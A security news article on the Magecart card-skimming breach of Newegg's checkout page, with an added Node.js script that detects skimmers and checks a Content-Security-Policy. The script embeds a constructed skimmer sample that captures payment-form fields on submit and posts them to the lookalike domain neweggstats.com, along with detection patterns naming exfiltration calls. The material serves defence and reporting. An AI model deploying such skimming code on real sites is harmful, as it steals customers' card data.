Magecart hacking group is back: Newegg customers' data stolen

by Jake Doevan

Magecart uses the same credit card skimming technique to steal data from Newegg customers

Magecart breaks into Newegg's website

The infamous hacking group Magecart, which was responsible for the highly targeted Ticketmaster[1] and British Airways[2] data breaches, has claimed another victim: the major hardware and electronics retailer Newegg. Customers who entered their credit card details while buying the company's merchandise between August 14 and September 18 were affected by the breach.

According to researchers from RiskIQ[3] and Volexity,[4] the group again targeted an eCommerce website to harvest sensitive payment data and send it to a remote server, just as in its previous attacks. The hackers once more used a credit card skimmer, a tactic that proved extremely successful in the earlier incidents. The Magecart group is not only refining its tactics but also becoming more rampant, claiming more victims through the websites of leading companies.

After learning of the breach, Newegg CEO Danny Lee stated the following:

The malware was quite sophisticated and we are conducting extensive research to determine exactly what information may have been acquired or accessed and how many customers may have been impacted.

A sophisticated attack infiltrated users' payment process

The Magecart operators started their operation on 13 August by registering the domain neweggstats.com, incorporating the retailer's name to make it look legitimate. The next day they obtained a TLS (SSL) certificate for it from Comodo, so that the exfiltration traffic would go over HTTPS and the domain would raise no browser warnings, further strengthening the illusion of legitimacy.

Initially the domain resolved to an ordinary hosting provider, but it was later pointed at 217.23.4.11, a server controlled by the attackers on which the harvested card data was collected. On 14 August the Magecart group inserted malicious JavaScript into the legitimate Newegg website, newegg.com. To see where that code ran, consider the steps a customer goes through when buying a product:

  1. Put a product in their shopping cart.
  2. Go to the first step of the checkout and enter their delivery information.
  3. Once the address is validated, proceed to the next page, payment processing, where they enter their credit card information.

According to RiskIQ, the skimmer was well obfuscated and, unlike the Ticketmaster case, was not delivered through a third-party script: it was embedded directly in Newegg's own payment-processing page. As a result the code only ran, and could only be observed, once a customer reached the payment step, which is why routine checks of the storefront and earlier checkout pages would not have revealed it.

Because the skimmer was hidden so well, it stayed in operation for more than a month, until it was removed on 18 September.
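As an added example (not code from the article, from RiskIQ or from Volexity), the Node.js script below shows two checks a shop could run against its own checkout page: a static scan of a script body for the pattern the article describes (hook the payment form's submit, serialise the fields, send them to an outside host), and an evaluation of whether a Content-Security-Policy connect-src would have blocked the beacon to the lookalike domain. The skimmer text, the allowlist and the CSP strings are constructed for the example; neweggstats.com and the form-hooking behaviour come from the article, while the form selector and the endpoint path are assumptions.

```javascript
// Added example, not the real Newegg skimmer or any vendor's tooling.
// Constructed sample: what an inline skimmer on a payment page might look like.
// The selector "#checkout" and the path "/GlobalData/" are assumptions.
const SAMPLE_PAYMENT_PAGE_SCRIPT = `
  window.onload = function () {
    $("#checkout").on("submit", function () {
      var data = $("#checkout").serialize();
      var req = new XMLHttpRequest();
      req.open("POST", "https://neweggstats.com/GlobalData/", true);
      req.send(data);
    });
  };
`;

// Hosts the shop legitimately contacts from its checkout pages (assumed list).
const ALLOWED_HOSTS = new Set(["newegg.com", "www.newegg.com", "secure.newegg.com"]);

// Pull every absolute http(s) URL out of a script body and return the hosts.
function extractOutboundHosts(scriptSource) {
  const re = /https?:\/\/([a-z0-9.-]+)/gi;
  const hosts = new Set();
  let m;
  while ((m = re.exec(scriptSource)) !== null) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// Crude signature of the technique: attaches to a form submit, reads form
// fields, and has a way to send data out of the page.
function looksLikeSkimmer(scriptSource) {
  const hooksForm = /\.(on|addEventListener)\(\s*["']submit["']/.test(scriptSource)
                 || /onsubmit/.test(scriptSource);
  const readsFields = /serialize\(|FormData\(|\.value\b/.test(scriptSource);
  const sendsOut = /XMLHttpRequest|fetch\(|sendBeacon\(|new Image\(/.test(scriptSource);
  return hooksForm && readsFields && sendsOut;
}

// Flag outbound hosts that are not on the allowlist; mark lookalikes that embed
// the brand name (the neweggstats.com trick) so they can be triaged first.
function findSuspiciousHosts(scriptSource, allowed, brand) {
  return extractOutboundHosts(scriptSource)
    .filter((h) => !allowed.has(h))
    .map((h) => ({ host: h, lookalike: h.includes(brand) }));
}

// Minimal connect-src evaluator: would this CSP let the beacon through?
// Handles connect-src with default-src fallback, 'self', 'none', exact hosts
// and *.example wildcards. Not a full CSP implementation (no schemes/ports).
function cspAllowsConnect(cspHeader, targetUrl, pageHost) {
  const directives = cspHeader.split(";").map((s) => s.trim());
  const directive = directives.find((s) => s.startsWith("connect-src "))
                 || directives.find((s) => s.startsWith("default-src "));
  if (!directive) return true; // neither directive present: not restricted
  const sources = directive.split(/\s+/).slice(1);
  const target = new URL(targetUrl).hostname;
  return sources.some((src) => {
    if (src === "'none'") return false;
    if (src === "'self'") return target === pageHost;
    if (src === "*") return true;
    const host = src.replace(/^https?:\/\//, "").split("/")[0];
    if (host.startsWith("*.")) return target.endsWith(host.slice(1));
    return target === host;
  });
}

// Run both checks over the constructed sample and return a report object.
function auditPaymentScript(scriptSource, cspHeader, pageHost) {
  const suspicious = findSuspiciousHosts(scriptSource, ALLOWED_HOSTS, "newegg");
  return {
    skimmerPattern: looksLikeSkimmer(scriptSource),
    suspiciousHosts: suspicious,
    cspBlocksBeacon: suspicious.every(
      (s) => !cspAllowsConnect(cspHeader, `https://${s.host}/`, pageHost)
    ),
  };
}

console.log(auditPaymentScript(
  SAMPLE_PAYMENT_PAGE_SCRIPT,
  "default-src 'self'; connect-src 'self' https://api.newegg.com",
  "www.newegg.com"
));
```

Two caveats a practitioner would add. The static scan only catches the unobfuscated shape shown here; the real skimmer was obfuscated, so a production check should run against the page as the browser executes it (for instance, a headless browser that records every outbound request on the payment step). And because Magecart modified Newegg's own server-side page, the attackers could in principle have edited the CSP header as well; a strict connect-src is defence in depth that stops the simplest beacon and raises the bar, not a substitute for integrity monitoring of the checkout pages themselves.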

More questions than answers at the current investigation stage

As Newegg's CEO noted, not much is currently known about the full extent of the attack. However, both desktop and mobile users were affected, and since more than 50 million customers[5] visit the site each month, the consequences could be drastic: millions of users could be at risk of financial fraud and identity theft.

Those who entered payment details on the Newegg website during that period should immediately contact their bank, block the credit card that was used, and watch their statements for unauthorised charges.

RiskIQ voiced its concerns about the Magecart group and about the risk posed by major retailers' own eCommerce pages handling payment transactions:

The attack on Newegg shows that while third parties have been a problem for websites—as in the case of the Ticketmaster breach—self-hosted scripts help attackers move and evolve, in this case changing the actual payment processing pages to place their skimmer.  

About the author

Jake Doevan is one of the News Editors for 2-spyware.com. He graduated from Washington and Jefferson College with a degree in Communication and Journalism.

References